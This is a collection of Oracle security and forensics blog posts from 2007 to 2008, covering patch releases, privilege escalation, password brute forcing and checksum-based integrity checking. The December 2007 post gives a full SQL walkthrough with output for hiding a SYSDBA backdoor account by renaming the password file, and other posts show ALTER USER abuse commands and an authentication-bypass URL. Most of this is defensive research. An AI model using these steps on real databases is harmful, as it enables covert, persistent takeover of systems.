
Sysdba Backdoor in Japan

Paul Wright August 25th, 2008

Just noticed that my SYSDBA Backdoor paper has been published in Japan through NGS’ contacts.
www.dcs.co.jp/security/NGS_freedownloads/OracleSysDBA_Backdoor.pdf
It is a compliment for this work to be of widespread use, and there is more on the way.

There is still a lot of work that needs to be done with database security in general not only in the form of software bugs that raise security issues but also in securing the data itself. Pete has an article on the PA Consulting incident here.

I note that the majority of reported incidents in the UK are government agencies, as they are more duty-bound to disclose a breach. UK-based private companies are not under the same obligation to disclose a breach as US companies, as can be seen at http://www.privacyrights.org/ar/ChronDataBreaches.htm
Wells Fargo and the InterActive Financial Marketing Group are among recent victims in the US. Would these companies have notified if they were in the UK, and how many private companies choose not to notify in the UK each year? To compare with the US, they have had over 1,000 notified breaches since 2003, averaging $6.3 million in cost each. There is probably a similar amount of activity in the UK, and the average cost of a breach in the UK is £1.4 million (Ponemon Institute, LLC). Would the UK benefit from a data breach law? It would certainly benefit from more use of GPG or TrueCrypt on exported data.

Cheers,
Paul

PL/SQL Source code version in the DB

Paul Wright August 17th, 2008

I have experienced that it is common for the version of code in the PRODUCTION DB to be different from that which CVS or Subversion says it is, i.e. the code in the DB can be out of sync with the code repository.
This can be ascertained by a simple query (substitute the package of interest for PACKAGE_NAME; the ORDER BY keeps the source lines in their original order so the output can be compared with the repository copy):
SELECT TEXT FROM DBA_SOURCE WHERE NAME = 'PACKAGE_NAME' ORDER BY LINE;
Or by checksumming the code automatically as laid out in my book.
Of interest is the fact that in some situations the source of a procedure is still present in DBA_SOURCE even though the procedure has been dropped. More to come on this, as remains of deleted data often form evidence which would be of interest in a forensic investigation.

If you have not seen it, this thread at Pete’s site is an interesting one. One of the reasons for wanting to control access to the ALTER USER command could be to stop a user making themselves EXTERNALLY identified:
ALTER USER SCOTT IDENTIFIED EXTERNALLY;
or maybe even
ALTER USER SCOTT IDENTIFIED BY VALUES 'EXTERNAL';
Also
ALTER USER SCOTT IDENTIFIED BY VALUES 'SCOTT.BADPROC';
which could be executed if called from a script that reads in DB users and passwords.
Additionally, the ALTER USER syntax gives that user the ability to set up proxy relationships via a command such as
ALTER USER SCOTT GRANT CONNECT THROUGH ORCL AS DBA;

In terms of user management, removing the ability to do the above is a good idea, so a nice thread.

Just noticed the following vulnerability thread on Bugtraq: http://www.securityfocus.com/archive/1/495336
This gives a user with the DBA role the SYSDBA privilege. It is a vulnerability because DBA is not the highest privilege: a DBA cannot stop and start the DB or read the X$ tables, so gaining SYSDBA access could present a security problem. I think this is especially true given that access to strong crypto on 10gR2 via DBMS_CRYPTO is restricted to the SYSDBA user. However, there are many other ways to escalate DBA to SYSDBA, so perhaps most sites currently have higher priorities.

Cheers,
Paul

July CPU ~ OID Denial of Service

Paul Wright July 21st, 2008

The July CPU is beginning to settle now and some Oracle exploits are surfacing.
For instance, this denial of service in OID: http://www.milw0rm.com/exploits/6101
Plus there has been a PL/SQL vulnerability posted to Full-Disclosure: http://archives.neohapsis.com/archives/fulldisclosure/2008-07/0240.html
Plus an interesting bug in dbms_random: http://www.securityfocus.com/archive/1/494540/30/0/threaded
There are still more in the pipeline, so it is worth keeping on top of the CPU patches.

Sysdba privilege escalation

Paul Wright June 2nd, 2008

This post seems to have slipped under the radar and is another example of SYSDBA privilege escalation.
http://www.pythian.com/blogs/388/exploiting-sysdba-invoker-rights-using-trigger-on-database
There are a number of other internal privilege escalations in the RDBMS which use similar principles. More to come on this.

11g Security

Paul Wright May 25th, 2008

As soon as 11g came out I tested the ability to brute force it, as per the NISR paper I wrote a while back:
http://www.ngssoftware.com/research/papers/oraclepasswords.pdf
Great news: Oracle have fixed the listener so that multiple connections cannot be made in quick succession. The listener in 11g will indeed slow down the speed with which it replies to requests if they come from the same user, as is the case with a normal brute force. However, the listener only slows down IF the user account exists. Therefore it is a quick and easy task to enumerate existing usernames by trying to brute force their password and seeing whether the listener slows down the attempt or not. This has already been reported to Oracle.
11g is certainly an improvement but there is still work to be done. For instance, the 11g password algorithm may be more complex (salted), but the 10g password hashes still remain in place in sys.user$ even when the 11g password algorithm is used. The 10g hashes should be deleted if they are not being used, so this is an important hardening step for the DBA to take on 11g. Of course, test first and back up the hashes so they can be reinstated if necessary.
Additionally, the PL/SQL wrapping algorithm has not been changed, which will be on the list for the next release given that it has been publicly reversed by Pete Finnigan and others (see the Oracle Hacker’s Handbook).
The fact that 11g audit has less performance impact is very good, as there will be less reason to switch it off. This is important given that DB IDS and other off-server monitoring systems are far from 100% accurate.
Performance stats for 10g vs 11g basic audit would be interesting to see.
BTW I just upgraded WordPress to the latest version, which was a doddle using this YouTube video http://www.youtube.com/watch?v=3l5g7F9zk3I

Application Server Vulnerability

Paul Wright May 11th, 2008

http://www.securityfocus.com/archive/1/491865

In short, if an unauthenticated user makes this request:
"http://site/pls/portal/%0A"
then they will be able to access this URL
"http://site/dav_portal/portal/"
as though they were authenticated.

Interesting bug, I thought.

Also, I came across the web site below the other day, which has some interesting material on Oracle security, such as the 10g password hashing algorithm written in Python: http://www.thesprawl.org/infocalypse/index.php?title=Oracle_Authentication#Oracle_7-11_Password_Hashing_Algorithm

For your reference, the Oracle 11g hashing algorithm implemented in Python:
http://blog.red-database-security.com/2007/09/21/oracle-password-algorithm-11g-poc-code/

11g vulnerabilities ~ more detail

Paul Wright May 5th, 2008

More details on April 2008 CPU vulnerabilities.
http://www.securityfocus.com/archive/1/491521
http://www.securityfocus.com/archive/1/491522
http://www.securityfocus.com/archive/1/491524
Exploit code may be in the pipeline, so check milw0rm etc. Note that the last two affect 11g as well. The CPU installation has been smoother and more reliable in my experience, so you should seriously think about installing this, especially if your DB needs to restrict privilege to DB users, i.e. low-privileged users access Oracle directly.
For custom packages it is also worth auditing your PL/SQL packages using plsqlscanner or similar: http://www.red-database-security.com/software/plsqlscanner.html
Details about the DB04 vulnerability which I found are available at my publisher’s URL: http://www.dba-oracle.com/forensics/t_forensics_vulnerable.htm

Lateral SQL Injection

Paul Wright April 25th, 2008

David has released his latest paper, which investigates how, by changing NLS variables, an attacker can inject SQL into functions that do not normally take varchar input, e.g. those that accept dates. Functions that take no input but do rely on NLS variables are similarly affected. Lateral thinking.
Here is the paper http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf and congrats to NGS on winning the SC Security Company of the Year http://www.scmagazine.com/uk/awards/ and even more congrats to Betfair for winning the Queen’s Award again http://www.realbusiness.co.uk/news/international-business/5240271/queens-awards-the-big-winners.thtml
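As an added example (not code from David's paper or from this blog), here is the pattern the paper describes, in the form a DBA would review it: a PL/SQL procedure that concatenates a DATE parameter into dynamic SQL, beside the bound form that removes the dependency on the session's NLS settings. The ORDERS table, ORDER_DATE column and both procedure names are assumed for illustration.

```sql
-- Added example, not from the paper. ORDERS, ORDER_DATE and the procedure
-- names are assumed for illustration.

-- Vulnerable form: the DATE parameter is implicitly converted to text with the
-- session's NLS_DATE_FORMAT before concatenation, so the text of the statement
-- that runs depends on a session setting the caller controls. A procedure that
-- takes no parameters but concatenates SYSDATE has exactly the same exposure.
CREATE OR REPLACE PROCEDURE COUNT_ORDERS_SINCE_UNSAFE(p_since IN DATE) AS
  l_sql VARCHAR2(4000);
  l_cnt NUMBER;
BEGIN
  l_sql := 'SELECT COUNT(*) FROM ORDERS WHERE ORDER_DATE >= ''' || p_since || '''';
  EXECUTE IMMEDIATE l_sql INTO l_cnt;
  DBMS_OUTPUT.PUT_LINE('orders since ' || TO_CHAR(p_since, 'YYYY-MM-DD') || ': ' || l_cnt);
END;
/

-- Hardened form: the DATE never becomes part of the statement text. It is passed
-- as a bind variable, so NLS_DATE_FORMAT has no way to alter the SQL executed.
CREATE OR REPLACE PROCEDURE COUNT_ORDERS_SINCE(p_since IN DATE) AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM ORDERS WHERE ORDER_DATE >= :since'
    INTO l_cnt USING p_since;
  DBMS_OUTPUT.PUT_LINE('orders since ' || TO_CHAR(p_since, 'YYYY-MM-DD') || ': ' || l_cnt);
END;
/

-- If concatenation really is unavoidable, convert with an explicit, fixed format
-- on both sides so the session's NLS settings play no part:
--   l_sql := 'SELECT COUNT(*) FROM ORDERS WHERE ORDER_DATE >= TO_DATE('''
--            || TO_CHAR(p_since, 'YYYYMMDD') || ''', ''YYYYMMDD'')';
```

When reviewing a schema for this, grep the PL/SQL source (DBA_SOURCE) for EXECUTE IMMEDIATE and DBMS_SQL strings that concatenate a DATE or NUMBER variable rather than binding it; definer's-rights procedures with only DATE parameters are the ones that used to be assumed safe.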

Java Oracle Security

Paul Wright April 22nd, 2008

Oracle Middle tier applications usually use Java which is why I have been working on Java Security both at work and for SANS in terms of training at http://www.sans.org/london07/description.php?tid=1517 and presenting http://www.sans.org/sans2008/night.php.
Here are the Powerpoint notes in PDF from my latest presentation javasecurity.pdf given April 22nd at SANS Orlando.

April 2008 CPU

Paul Wright April 15th, 2008

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2008.html

The April 2008 CPU came out at 9.00pm UK time tonight as normal. Two of the vulnerabilities are ones that I found whilst working at NGS, and both are PL/SQL injections, but the most critical bug is the JInitiator JVM bug. Java vulnerabilities are the subject of a presentation I am giving next week at SANS Orlando http://www.sans.org/sans2008/night.php. More to come on this subject.

Cheers,
Paul

Checksumming Presentation

Paul Wright March 22nd, 2008

Hello Folks,
I have just been asked for a copy of the UKOUG presentation I gave in December at Birmingham, as the person asking could not find it on UKOUG’s site, so here it is. The UKOUG site is being updated, which may explain the current difficulty finding recent papers, as the last two years’ conferences were not on there when I looked. In January, I moved work place to the centre of London at Betfair.com. Here is some information about Betfair and Oracle: http://www.oracle.com/customers/snapshots/betfair-database-case-study.pdf.
Also, this is the Head of our Security Department at Betfair, Adrian Asher.

As an aside, for Imperva users out there, I noticed that there is an alert on Bugtraq for Imperva SecureSphere
http://www.securityfocus.com/bid/28279/info . The solution is to upgrade to version 6.0. This is an important upgrade as it fixes a number of problems with version 5.0.

General release of the Oracle Forensics book is in May.
http://www.amazon.com/Oracle-Forensics-Security-Practices-Focus/dp/0977671526
If you want a reviewer’s copy just send me an email to paul@oracleforensics.com

David’s book will also be out this year, so it is promising to be an eventful year.
http://www.amazon.com/Oracle-Forensics-Using-Quisix-Litchfield/dp/047019118X

From a general IT Security point of view I think the role of IT Security in the political process is an interesting one and from a strategic level this presentation may provide some relief from Infosec.
http://www.oracle.com/global/uk/citizen-security/speakers.html

My next presentation is at SANS Orlando, with Stephen Northcutt, on Java Security, so I had better get back to writing it.

Take care, have a great Easter and don’t forget to set the clocks forward on the 30th.
Paul

AlexK Best of 2007 in English

Research from Arizona University

Oracle Forensics Book ~ Now Available

Paul Wright December 26th, 2007

About time too! Copies are available through Rampant Techpress. Author’s copies in the UK can be made available to reviewers by contacting reviewcopy@oracleforensics.com.
Cheers and Merry Christmas 2007

SYSDBA Backdoor without direct OS access

Paul Wright December 24th, 2007

The first half of the SYSDBA BACKDOOR paper is easily done without OS access
--------------------------------------------------------------------------
The attacker brute forces a SYSDBA user and wishes to create a user that is hidden from SYS.USER$.
1. CREATE USER
2. GRANT SYSDBA TO USER
3. Rename the password file via UTL_FILE.FRENAME (requires CREATE DIRECTORY).
4. DROP USER via the DB to lose the entry from SYS.USER$
5. Rename the password file back

In detail on 11g Unbreakable Linux:
------------------------------------
First, how to get the location and filename of the OS-based password file.
By default it is in the same directory as the SPFILE, which can be found as follows.

-- get the location
SQL> SELECT value FROM v$parameter WHERE NAME='spfile';
VALUE
--------------------------------------------------------------------------------
/home/oracle/app/oracle/product/11.1.0/db_1/dbs/spfileorcl.ora

-- get the name of the password file
By default the filename is
PWD<SID>.ora (on Windows) or
orapw<SID> on UNIX.

SQL> select global_name from global_name;
GLOBAL_NAME
--------------------------------------------------------------------------------
ORCL

Therefore the attacker can work out the full path:
/home/oracle/app/oracle/product/11.1.0/db_1/dbs/orapworcl

So here we go in SQL*PLUS for demo purposes.

-- create the backdoor SYSDBA user.

SQL> create user attacker identified by attacker
2 default tablespace users
3 temporary tablespace temp;
User created.

SQL> GRANT SYSDBA TO attacker;
Grant succeeded.

-- remote machine
C:\Documents and Settings\PaulWright>sqlplus attacker/attacker@10.1.1.225/orcl as sysdba
SQL*Plus: Release 10.1.0.4.2 - Production on Fri Dec 21 23:07:08 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> show user
USER is "SYS"   -- backdoor attacker account is working
SQL>

-- the account is listed in sys.user$
SQL> SELECT NAME FROM SYS.USER$ ORDER BY NAME;
NAME
------------------------------
ANONYMOUS
APEX_PUBLIC_USER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
ATTACKER
AUTHENTICATEDUSER
BI

-- attacker gets rid of the sys.user$ entry by first creating a directory to access the password file.
SQL> create directory password_file as '/home/oracle/app/oracle/product/11.1.0/db_1/dbs';
Directory created.

-- attacker renames the password file so that the subsequent drop user does not affect the password file
SQL> BEGIN
2 UTL_FILE.FRENAME('PASSWORD_FILE', 'orapworcl', 'PASSWORD_FILE', 'orapworclBU', TRUE);
3 END;
4 /

-- then drops the user
SQL> drop user attacker;
User dropped.

-- trying to log on as sysdba now fails
C:\Documents and Settings\PaulWright>sqlplus attacker/attacker@10.1.1.225/orcl as sysdba
SQL*Plus: Release 10.1.0.4.2 - Production on Fri Dec 21 23:13:39 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
ERROR:
ORA-01031: insufficient privileges
Enter user-name:

-- copy back the password file by renaming it to the original name with the overwrite option set to TRUE.
SQL> BEGIN
2 UTL_FILE.FRENAME('PASSWORD_FILE', 'orapworclBU', 'PASSWORD_FILE', 'orapworcl', TRUE);
3 END;
4 /

PL/SQL procedure successfully completed.

-- attacker is no longer in sys.user$ or dba_users but can log on remotely as SYSDBA.
SQL> select name from sys.user$ order by name;
NAME
------------------------------
ANONYMOUS
APEX_PUBLIC_USER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
AUTHENTICATEDUSER
BI
BILL

To secure against this, first make sure that no one can brute force as SYSDBA (see the previous OraBrute paper).
Then regularly check the x$ tables and statecheck the password file as well as the oracle binary.
In addition, it is generally good security to remove means of accessing the OS from the DB, both via UTL_FILE and Java, and to restrict the CREATE DIRECTORY privilege.
In terms of forensic investigation, the last modified timestamp on the file does not change when it is renamed but the last accessed does (NTFS), but that is for another posting. More to come, and Merry Christmas!
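As an added example of the "statecheck pwfile" step (not code from the paper): a PL/SQL procedure that reads the password file through a BFILE, digests it with both MD5 and SHA1, and compares the result with the last recorded state. It assumes a DBA-owned directory object PWFILE_DIR pointing at $ORACLE_HOME/dbs, the UNIX filename orapworcl from the session above, and a PWFILE_STATE table; it is meant to be run from a trusted SYSDBA session, since it needs DBMS_CRYPTO and exactly the kind of directory object the post advises restricting for everyone else.

```sql
-- Added example, not from the paper. PWFILE_DIR and PWFILE_STATE are assumed names.
-- Run as a trusted DBA: needs READ on the directory and EXECUTE on DBMS_CRYPTO.
CREATE TABLE PWFILE_STATE (
  checked_at DATE,
  file_name  VARCHAR2(255),
  file_bytes NUMBER,
  md5        RAW(16),
  sha1       RAW(20));

CREATE OR REPLACE PROCEDURE PWFILE_STATECHECK(p_dir IN VARCHAR2, p_file IN VARCHAR2) AS
  l_bfile     BFILE := BFILENAME(p_dir, p_file);
  l_blob      BLOB;
  l_len       NUMBER;
  l_md5       RAW(16);
  l_sha1      RAW(20);
  l_prev_len  NUMBER;
  l_prev_md5  RAW(16);
  l_prev_sha1 RAW(20);
BEGIN
  -- Read the whole file into a temporary BLOB; a password file is only a few KB.
  DBMS_LOB.CREATETEMPORARY(l_blob, TRUE);
  DBMS_LOB.FILEOPEN(l_bfile, DBMS_LOB.FILE_READONLY);
  l_len := DBMS_LOB.GETLENGTH(l_bfile);
  DBMS_LOB.LOADFROMFILE(l_blob, l_bfile, l_len);
  DBMS_LOB.FILECLOSE(l_bfile);

  -- Two independent digests, so a single-algorithm collision is not enough to hide a change.
  l_md5  := DBMS_CRYPTO.HASH(l_blob, DBMS_CRYPTO.HASH_MD5);
  l_sha1 := DBMS_CRYPTO.HASH(l_blob, DBMS_CRYPTO.HASH_SH1);
  DBMS_LOB.FREETEMPORARY(l_blob);

  -- Compare with the most recent recorded state for this file.
  BEGIN
    SELECT file_bytes, md5, sha1 INTO l_prev_len, l_prev_md5, l_prev_sha1
      FROM (SELECT file_bytes, md5, sha1 FROM PWFILE_STATE
             WHERE file_name = p_file ORDER BY checked_at DESC)
     WHERE ROWNUM = 1;
    IF l_prev_len <> l_len OR l_prev_md5 <> l_md5 OR l_prev_sha1 <> l_sha1 THEN
      -- GRANT SYSDBA (step 2 of the backdoor) rewrites this file, and the entry
      -- survives the later DROP USER, so an unexplained change needs investigating.
      DBMS_OUTPUT.PUT_LINE('ALERT: ' || p_file || ' changed since last check ('
        || l_prev_len || ' -> ' || l_len || ' bytes)');
    ELSE
      DBMS_OUTPUT.PUT_LINE('OK: ' || p_file || ' unchanged');
    END IF;
  EXCEPTION
    WHEN NO_DATA_FOUND THEN
      DBMS_OUTPUT.PUT_LINE('No baseline for ' || p_file || '; recording first state');
  END;

  INSERT INTO PWFILE_STATE VALUES (SYSDATE, p_file, l_len, l_md5, l_sha1);
  COMMIT;
END;
/

SET SERVEROUTPUT ON
-- Take the baseline on a known-clean database, then run on a schedule (DBMS_SCHEDULER).
EXEC PWFILE_STATECHECK('PWFILE_DIR', 'orapworcl');
```

Legitimate changes to the file (a SYS password change, a GRANT or REVOKE of SYSDBA/SYSOPER) will also raise the alert, so each alert is reconciled against the change record; an alert with no matching change, or one where V$PWFILE_USERS shows nothing new, is what the post's forensic follow-up is about.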

SYSDBA Backdoor

Paul Wright October 14th, 2007

New Oracle Security/Forensics paper. http://www.oracleforensics.com/oraclesysdbabackdoor.pdf
This paper is a follow-up to the Oracle Passwords and OraBrute paper, which described the issue of SYSDBA brute forcing in 10g. Subsequent to brute forcing a SYSDBA account, an attacker will wish to maintain SYSDBA access in a covert manner such that a DBA or security auditor will not be aware that the attacker has maintained this access over time. Within Oracle databases such as 11g it is a quick and easy task to create a SYSDBA account that is hidden from SYS.USER$, DBA_USERS, V$PWFILE_USERS and GV$PWFILE_USERS, so that a user with DBA privileges cannot tell that the hacker’s SYSDBA account is present in the DB. This paper examines such a SYSDBA “backdoor”, proposes defenses and an appropriate forensic response, with more detail in the new Oracle Forensics book.

http://www.rampant-books.com/book_2007_1_oracle_forensics.htm
This issue affects all supported versions of Oracle’s RDBMS.

Finding Evidence of Data Theft in the Absence of Auditing

Paul Wright August 10th, 2007

David Litchfield’s latest paper on Oracle Forensics is available at this URL.
http://www.databasesecurity.com/dbsec/OracleForensicsPt5.pdf

Forensic checksumming on all versions of supported Oracle databases

Paul Wright July 25th, 2007

Below is an excerpt from my new book on Oracle Forensics, which is available through Rampant Techpress and contains both the underlying concepts and advanced practice of Oracle forensics for both incident handling and vulnerability detection. A cornerstone of the book is the need to fully understand the methods that an attacker may use to attack an Oracle server so that the security practitioner can effectively secure the DB and respond effectively to an incident. Excerpt:
Checksums have been used in forensics to verify the state of a piece of code for many years, both in terms of Tripwire OS applications and also lists of known good checksums such as those produced at NIST http://www.nsrl.nist.gov/ .
Creating checksums in an Oracle database to verify integrity is pretty straightforward.
DBMS_UTILITY.GET_HASH_VALUE is available on 7, 8, 9 and 10 and is fast, but has a different implementation on 7 and therefore returns a different checksum there. This is not good for forensic consistency.
DBMS_OBFUSCATION_TOOLKIT.MD5 is good on 9 and 10 (not 8) and cryptographically stronger than DBMS_UTILITY, but slower due to the more complex computation.
DBMS_CRYPTO.HASH_SH1 is on 10 only and not fast, but the most secure of the three. Additionally, use of MD5 and SHA1 together is not susceptible to malicious use of a collision, where two files with differing content have the same checksum. http://www.doxpara.com/md5_someday.pdf. By using stripwire http://www.doxpara.com/stripwire-1.1.tar.gz it is possible for an attacker to control the content of a malicious collision.

However, using both MD5 and SHA1 checksums, dual collisions become all but impossible.

In summary, DBMS_UTILITY is useful for checking patches and day-to-day state checking where speed is important, but for higher security MD5 or preferably SHA1 should be used. For very high security purposes it is preferable to check integrity using a combination of both MD5 and SHA1.

Here is an example to check the state of VIEWs in a given schema using the SHA1 algorithm:

set wrap off
set linesize 400
set serveroutput on
DROP TABLE SHA1VIEWSTATES;
CREATE TABLE SHA1VIEWSTATES(SHA1SCHEMA VARCHAR2(40), SHA1NAME VARCHAR2(40), SHA1CHECKSUM VARCHAR2(40));
CREATE OR REPLACE PROCEDURE SHA1DBVIEWSTATECHECKER(lvschema in varchar2) AS
TYPE C_TYPE IS REF CURSOR;
CV C_TYPE;
l_hash raw(2000);
lvname VARCHAR2(30);
lvtype varchar2(30) := 'VIEW';
begin
DBMS_OUTPUT.ENABLE(200000);
OPEN CV FOR 'SELECT DISTINCT OBJECT_NAME FROM SYS.DBA_OBJECTS WHERE OBJECT_TYPE=''VIEW'' AND OWNER = :x' using lvschema;
LOOP
FETCH CV INTO lvname;
EXIT WHEN CV%NOTFOUND; -- must directly follow the FETCH, otherwise the last view is hashed and inserted twice
-- DBMS_METADATA returns the view DDL as a CLOB, which DBMS_CRYPTO.HASH accepts directly
l_hash := dbms_crypto.hash(dbms_metadata.get_ddl(lvtype, lvname, lvschema), dbms_crypto.hash_sh1);
dbms_output.put_line('HashSHA1='||l_hash||' Name='||lvschema||'.'||lvname);
insert into SHA1VIEWSTATES values(lvschema, lvname, l_hash);
END LOOP;
CLOSE CV;
COMMIT;
end;
/
EXEC SHA1DBVIEWSTATECHECKER('SYS');
SELECT * FROM SHA1VIEWSTATES;

-- Carry out again in the future, writing into a second table (SHA1VIEWSTATESNEW, created with the same columns),
-- and compare to the baseline to see if there has been a change.
-- If both result sets are identical there should be no rows from this query.

(SELECT * FROM SHA1VIEWSTATES MINUS SELECT * FROM SHA1VIEWSTATESNEW)
UNION
(SELECT * FROM SHA1VIEWSTATESNEW MINUS SELECT * FROM SHA1VIEWSTATES);
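The book excerpt above hashes views with SHA1 only and needs a second table for the rerun. As an added example (not code from the book or this blog), here is the same idea extended to the MD5 plus SHA1 combination the excerpt recommends for high-security checking, across views and PL/SQL object types, with run-tagged rows in one table and a query that classifies each difference between two runs. OBJ_HASH_BASELINE, HASH_SCHEMA_OBJECTS and the run tags are assumed names.

```sql
-- Added example, not from the book. Table, procedure and run-tag names are assumed.
CREATE TABLE OBJ_HASH_BASELINE (
  run_tag  VARCHAR2(30),
  owner    VARCHAR2(30),
  obj_type VARCHAR2(30),
  obj_name VARCHAR2(30),
  md5      RAW(16),
  sha1     RAW(20));

CREATE OR REPLACE PROCEDURE HASH_SCHEMA_OBJECTS(p_schema IN VARCHAR2, p_run_tag IN VARCHAR2) AS
  l_ddl     CLOB;
  l_md_type VARCHAR2(30);
BEGIN
  FOR r IN (SELECT object_type, object_name
              FROM dba_objects
             WHERE owner = p_schema
               AND object_type IN ('VIEW', 'PROCEDURE', 'FUNCTION', 'PACKAGE', 'PACKAGE BODY', 'TRIGGER'))
  LOOP
    -- DBA_OBJECTS and DBMS_METADATA name the two halves of a package differently.
    l_md_type := CASE r.object_type
                   WHEN 'PACKAGE'      THEN 'PACKAGE_SPEC'
                   WHEN 'PACKAGE BODY' THEN 'PACKAGE_BODY'
                   ELSE r.object_type END;
    BEGIN
      l_ddl := DBMS_METADATA.GET_DDL(l_md_type, r.object_name, p_schema);
      -- Both digests over the same DDL text: hiding a change would need a simultaneous MD5 and SHA1 collision.
      INSERT INTO OBJ_HASH_BASELINE VALUES (p_run_tag, p_schema, r.object_type, r.object_name,
        DBMS_CRYPTO.HASH(l_ddl, DBMS_CRYPTO.HASH_MD5),
        DBMS_CRYPTO.HASH(l_ddl, DBMS_CRYPTO.HASH_SH1));
    EXCEPTION
      WHEN OTHERS THEN
        -- e.g. ORA-31603 when DBMS_METADATA cannot fetch an object; report it rather than skip silently.
        DBMS_OUTPUT.PUT_LINE('skipped ' || r.object_type || ' ' || r.object_name || ': ' || SQLERRM);
    END;
  END LOOP;
  COMMIT;
END;
/

SET SERVEROUTPUT ON
EXEC HASH_SCHEMA_OBJECTS('SYS', 'BASELINE');
-- ... later, after a CPU or on a schedule:
EXEC HASH_SCHEMA_OBJECTS('SYS', 'CHECK_1');

-- Every object whose DDL differs between the two runs, or that exists in only one of them.
SELECT NVL(b.obj_type, c.obj_type) AS obj_type,
       NVL(b.obj_name, c.obj_name) AS obj_name,
       CASE WHEN b.obj_name IS NULL THEN 'NEW'
            WHEN c.obj_name IS NULL THEN 'DROPPED'
            ELSE 'CHANGED' END AS status
  FROM (SELECT * FROM OBJ_HASH_BASELINE WHERE run_tag = 'BASELINE') b
  FULL OUTER JOIN
       (SELECT * FROM OBJ_HASH_BASELINE WHERE run_tag = 'CHECK_1') c
    ON b.owner = c.owner AND b.obj_type = c.obj_type AND b.obj_name = c.obj_name
 WHERE b.obj_name IS NULL OR c.obj_name IS NULL
    OR b.md5 <> c.md5 OR b.sha1 <> c.sha1
 ORDER BY status, obj_type, obj_name;
```

Run the baseline on a freshly patched, known-good database and keep a copy of OBJ_HASH_BASELINE off the server, otherwise an attacker with SYSDBA can simply re-baseline after making their change.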

I am now going to SANSFIRE in Washington DC, where I will be leading a BoF on Oracle Forensics to launch my new book, auditing the GCIA for ANSI and testing the new GSEs for SANS/GIAC, as well as catching up with some old friends.
Cheers,
Paul
Additional relevant links:
http://eprint.iacr.org/2006/104.pdf
http://web.mit.edu/AFS/sipb/project/fastcoll/
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

Catchup

Paul Wright May 20th, 2007

Not been blogging for a while due to being busy at work. In the meantime there has been the following.
1. Oracle Audit Vault released by Oracle, but don’t forget to read the trial license… and that goes with many “free” Oracle products, interestingly (30 days, in other words).
2. Oracle Forensics Live Response paper by David. It starts with code that could give the DBA a nasty surprise on reboot and extends the idea of creating a checksum profile that can be stored and compared at a later time. Checksums for Java byte code can be made using code in the paper. Additionally, David refers to a commercial unwrapper for PL/SQL. Unwrappers have been around for a while. In order to be forensically sure of a piece of code’s effect, the source code needs to be read, so an unwrapper will have many positive uses.
3. http://www.ukoug.co.uk/calendar/show_event.jsp?id=2861
is an interesting SIG meeting with a security flavour, though the contents of Pete’s presentation are already online. Professor Carl Dudley’s presentation on TDE is also worth making a journey for.
4. David is giving a very interesting talk at AusCERT. Wish I was there, and not just for the sun, as this presentation looks like the current “what’s hot”. http://conference.auscert.org.au/conf2007/presentation.php#presentation_TP_04

On a personal side note: if anyone watched the BEEB documentary on Hendrix, a small correction needs to be added. Hendrix’s output did not go downhill after Woodstock, as the Band of Gypsys album, which many aficionados consider his most critically acclaimed, was recorded on New Year’s AFTER Woodstock.
http://www.amazon.com/Band-Gypsys-Jimi-Hendrix/dp/B000002UVX
Also, his influences were largely US soul, not the Brit pop of the time as the documentary suggests.
http://www.earlyhendrix.com/disco/confir.htm
For a much better Hendrix documentary I recommend “Jimi Hendrix” http://www.imdb.com/title/tt0070242/

April 2007 CPU

Paul Wright April 19th, 2007

The April 2007 CPU is out at this URL. It is worth taking a DBState before the patch and one after to see what has changed, as per my GSOC paper.
NGS are the only company with two researchers mentioned, and David was first to publish an in-depth analysis of the CPU at this URL:
http://www.ngssoftware.com/research/papers/NGSSoftware-OracleCPUAPR2007.pdf
David’s analysis may have been first because he found most of the vulnerabilities, including the most critically rated, and there are plenty more to come.
